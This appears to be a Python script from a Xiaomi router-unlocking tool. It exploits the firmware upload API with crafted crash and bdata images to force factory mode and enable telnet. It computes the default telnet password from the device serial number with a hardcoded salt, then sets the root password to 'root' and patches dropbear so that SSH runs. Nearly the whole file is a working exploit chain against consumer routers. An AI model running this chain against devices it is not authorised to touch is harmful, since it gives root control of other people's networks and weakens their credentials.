You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
275 lines
9.2 KiB
Python
275 lines
9.2 KiB
Python
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import os
|
|
import sys
|
|
import types
|
|
import datetime
|
|
import platform
|
|
import ctypes
|
|
import hashlib
|
|
import binascii
|
|
import re
|
|
import requests
|
|
|
|
import xmir_base
|
|
from xqimage import *
|
|
from gateway import *
|
|
from read_info import *
|
|
from envbuffer import *
|
|
|
|
|
|
gw = Gateway(timeout = 4, detect_ssh = False)
|
|
if gw.status < 1:
|
|
die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
|
|
|
|
print("device_name =", gw.device_name)
|
|
print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
|
|
print("MAC Address = {}".format(gw.mac_address))
|
|
|
|
dn = gw.device_name
|
|
gw.ssh_port = 22
|
|
ret = gw.detect_ssh(verbose = 1, interactive = True)
|
|
if ret > 0:
|
|
die(0, "SSH server already installed and running")
|
|
|
|
|
|
class ExFlasher():
|
|
gw = None
|
|
devinf = None
|
|
syslog = None
|
|
|
|
def __init__(self, gw, ext = 'bin'):
|
|
self.gw = gw
|
|
self.ext = ext
|
|
self.devinf = DevInfo(gw, verbose = 0, infolevel = 0)
|
|
self.syslog = SysLog(gw, timeout = 22, verbose = 1, infolevel = 2)
|
|
|
|
def get_bdata_env(self, syslog = None, verbose = 1):
|
|
syslog = syslog if syslog is not None else self.syslog
|
|
syslog.verbose = verbose
|
|
bdata = self.syslog.parse_bdata()
|
|
if not bdata:
|
|
if self.gw.device_name != 'R3G':
|
|
die('File bdata.txt not found in syslog!')
|
|
facinfo = self.gw.get_factory_info()
|
|
bdata = EnvBuffer('SN={}\n'.format(syslog.device_sn), '\n')
|
|
bdata.var['color'] = '101'
|
|
bdata.var['CountryCode'] = 'CN'
|
|
bdata.var['model'] = self.gw.device_name.upper()
|
|
bdata.var['wl0_ssid'] = facinfo['wl0_ssid']
|
|
bdata.var['wl1_ssid'] = facinfo['wl1_ssid']
|
|
return bdata
|
|
|
|
def create_crash_image(self, mtd, prefix, outfilename):
|
|
crash = types.SimpleNamespace()
|
|
crash.mtd = mtd
|
|
if prefix is None:
|
|
prefix = b''
|
|
crash.buf = bytearray(prefix + b'\xFF' * (mtd.size - len(prefix)))
|
|
crash.img = XQImage(self.gw.device_name)
|
|
crash.img.add_version(self.gw.rom_version)
|
|
crash.img.add_file(crash.buf, 'crash.bin', mtd = mtd.id)
|
|
crash.img.save_image(outfilename)
|
|
print('Created hacked image file: "{}"'.format(outfilename))
|
|
return crash
|
|
|
|
def create_hack_images(self):
|
|
imgdict = {}
|
|
dn = self.gw.device_name
|
|
bdata = self.get_bdata_env(verbose = 2)
|
|
bdata.var['boot_wait'] = "on"
|
|
bdata.var['uart_en'] = "1"
|
|
bdata.var['telnet_en'] = "1"
|
|
bdata.var['ssh_en'] = "1"
|
|
#bdata.var['CountryCode'] = "EU"
|
|
partname = 'bdata'
|
|
bdata.mtd = self.syslog.get_mtd_by_name(partname)
|
|
if not bdata.mtd:
|
|
die('MTD partition "{}" not found!'.format(partname))
|
|
bdata_env_size = 0x10000 # fixed size of BData environment buffer
|
|
if dn == 'R3G':
|
|
bdata_env_size = 0x4000
|
|
bdata.buf = bdata.pack(bdata_env_size)
|
|
bdata.buf += b'\xFF' * (bdata.mtd.size - len(bdata.buf))
|
|
bdata.img = XQImage(self.gw.device_name)
|
|
bdata.img.add_version(self.gw.rom_version)
|
|
bdata.img.add_file(bdata.buf, 'bdata.bin', mtd = bdata.mtd.id)
|
|
|
|
partname = 'crash'
|
|
crash_mtd = self.syslog.get_mtd_by_name(partname)
|
|
if not crash_mtd:
|
|
die('MTD partition "{}" not found!'.format(partname))
|
|
|
|
# image for activate "factory mode" via uboot (insert factory_mode=1 into kernel cmdline)
|
|
imgdict['crash1'] = 'outdir/image_{device}_1_crash.{ext}'.format(device = dn, ext = self.ext)
|
|
crash1 = self.create_crash_image(crash_mtd, b'\xA5\x5A\x00\x00', imgdict['crash1'])
|
|
|
|
# image for change BData environment
|
|
imgdict['bdata'] = 'outdir/image_{device}_2_bdata.{ext}'.format(device = dn, ext = self.ext)
|
|
bdata.img.save_image(imgdict['bdata'])
|
|
print('Created hacked image file: "{}"'.format(imgdict['bdata']))
|
|
|
|
# image for deactivate "factory mode" via uboot
|
|
imgdict['crash3'] = 'outdir/image_{device}_3_crash.{ext}'.format(device = dn, ext = self.ext)
|
|
crash3 = self.create_crash_image(crash_mtd, None, imgdict['crash3'])
|
|
|
|
# image for testing (debug)
|
|
#fn_test = 'outdir/image_{device}_test.{ext}'.format(device = dn, ext = self.ext)
|
|
#test = self.create_crash_image(crash_mtd, b'TEST_DEBUG', fn_test)
|
|
return imgdict
|
|
|
|
def upload_rom(self, filename, timeout=6, verbose = 1):
|
|
self.upload_res = None
|
|
if not self.gw.stok:
|
|
self.gw.web_login()
|
|
if verbose:
|
|
print('Upload HDR1 image "{}" to device ...'.format(filename))
|
|
ok = False
|
|
try:
|
|
res = requests.post(self.gw.apiurl + "xqsystem/upload_rom", files={"image":open(filename, 'rb')}, timeout=4)
|
|
self.upload_res = res
|
|
if verbose:
|
|
print('Response:', res.text)
|
|
except requests.exceptions.Timeout as e:
|
|
ok = True
|
|
if verbose:
|
|
print('The hacked image has been successfully exploited. The device reboots...')
|
|
if timeout > 0:
|
|
if not self.gw.wait_shutdown(timeout):
|
|
die('The hacked image "{}" did not trigger a reboot.'.format(filename))
|
|
#print('Device not responding.')
|
|
return True
|
|
|
|
def wait_reboot(self, timeout):
|
|
if not self.gw.wait_reboot(timeout):
|
|
die('Device reboot timed out!!! (timeout = {} sec)'.format(timeout))
|
|
|
|
def patch_bdata(self):
|
|
if self.gw.rom_channel != 'release':
|
|
die('Supported only "release" firmware for this device')
|
|
imgdict = self.create_hack_images()
|
|
reboot_timeout = 75
|
|
|
|
# stage 1: enable factory mode
|
|
facinfo = self.gw.get_factory_info()
|
|
if facinfo['facmode'] is True:
|
|
print('Factory mode already activated.')
|
|
else:
|
|
self.upload_rom(imgdict['crash1'])
|
|
self.wait_reboot(reboot_timeout)
|
|
facinfo = self.gw.get_factory_info()
|
|
if not facinfo['facmode']:
|
|
die('Failed to activate factory mode.')
|
|
|
|
# stage 2: using factory mode for flashing Bdata
|
|
self.upload_rom(imgdict['bdata'])
|
|
self.wait_reboot(reboot_timeout)
|
|
self.gw.status = -2
|
|
slog = SysLog(self.gw, timeout = 12, verbose = 0, infolevel = 2)
|
|
slog.verbose = 2
|
|
bdata = slog.parse_bdata()
|
|
if not bdata or not bdata.var:
|
|
if self.gw.device_name != 'R3G':
|
|
die('File bdata.txt not found in syslog!')
|
|
bdata = EnvBuffer('telnet_en=1\n', '\n') # hack only for R3G
|
|
if not 'telnet_en' in bdata.var:
|
|
die('Failed to patch Bdata partition.')
|
|
if bdata.var['telnet_en'] != '1':
|
|
die('Failed to patch Bdata partition!')
|
|
|
|
# stage 3: disable factory mode
|
|
self.upload_rom(imgdict['crash3'])
|
|
self.wait_reboot(reboot_timeout)
|
|
self.gw.web_login()
|
|
return True
|
|
|
|
|
|
def calc_xqpassword(device_sn):
|
|
guid = 'd44fb0960aa0-a5e6-4a30-250f-6d2df50a' # finded into mkxqimage
|
|
salt = '-'.join(reversed(guid.split('-')))
|
|
password = hashlib.md5((device_sn + salt).encode('utf-8')).hexdigest()
|
|
return password[:8]
|
|
|
|
def device_factory_reset(timeout = 17, format_user_data = False):
|
|
try:
|
|
params = { 'format': '1' if format_user_data else '0' }
|
|
res = requests.post(gw.apiurl + "xqsystem/reset", params = params, timeout=timeout)
|
|
if res.text.find('{"code":0}') < 0:
|
|
die('Can\'t run Factory reset: ' + res.text)
|
|
print('Factory Reset activated...')
|
|
if not gw.wait_shutdown(timeout):
|
|
die('Factory reset request did not trigger a reboot.')
|
|
except Exception as e:
|
|
die('Can\'t run Factory reset.')
|
|
|
|
def telnet_connect(xqpass):
|
|
for i, psw in enumerate([xqpass, 'root']):
|
|
gw.passw = psw
|
|
tn = gw.get_telnet()
|
|
if tn:
|
|
return psw
|
|
return None
|
|
|
|
|
|
flasher = None
|
|
device_sn = None
|
|
|
|
if dn == 'RB03':
|
|
if gw.rom_version != '1.2.7':
|
|
die('First you need to install firmware version 1.2.7 (without saving settings)')
|
|
info = gw.get_init_info()
|
|
if not info or info["code"] != 0:
|
|
die('Cannot get init_info')
|
|
device_sn = info["id"]
|
|
else:
|
|
flasher = ExFlasher(gw)
|
|
device_sn = flasher.syslog.device_sn
|
|
|
|
print(f'Device Serial Number: {device_sn}')
|
|
xqpass = calc_xqpassword(device_sn)
|
|
print('Default Telnet password: "{}"'.format(xqpass))
|
|
|
|
if flasher:
|
|
if not gw.check_telnet():
|
|
bdata = flasher.get_bdata_env()
|
|
if not 'telnet_en' in bdata.var or bdata.var['telnet_en'] != '1':
|
|
flasher.patch_bdata()
|
|
if not gw.check_telnet():
|
|
die('The Telnet server could not be activated.')
|
|
else:
|
|
if not gw.check_telnet():
|
|
die('Telnet server not respond.')
|
|
|
|
'''
|
|
if flasher:
|
|
print('Connect to telnet ...')
|
|
if not telnet_connect(xqpass):
|
|
print('Can\'t connect to Telnet server.')
|
|
device_factory_reset()
|
|
flasher.wait_reboot(75)
|
|
'''
|
|
|
|
print('Connect to Telnet ...')
|
|
if not telnet_connect(xqpass):
|
|
die('Failed to authenticate on Telnet server.')
|
|
|
|
gw.use_ssh = False
|
|
gw.run_cmd('echo -e "root\\nroot" | passwd root')
|
|
time.sleep(1)
|
|
if not telnet_connect(xqpass):
|
|
die('Failed to authenticate on Telnet server.')
|
|
#gw.run_cmd('(echo root; sleep 1; echo root) | passwd root')
|
|
gw.run_cmd('sed -i \'s/"$flg_ssh" != "1" -o "$channel" = "release"/-n ""/g\' /etc/init.d/dropbear')
|
|
gw.run_cmd("/etc/init.d/dropbear enable")
|
|
print('Run SSH server on port 22 ...')
|
|
gw.run_cmd("/etc/init.d/dropbear restart", timeout = 40) # RSA host key generate very slow!
|
|
gw.run_cmd('logger -p err -t XMiR "completed!"')
|
|
|
|
gw.use_ssh = True
|
|
gw.passw = 'root'
|
|
gw.ping(contimeout = 32) # RSA host key generate very slow!
|
|
|
|
print('#### SSH and Telnet services are activated! ####')
|
|
|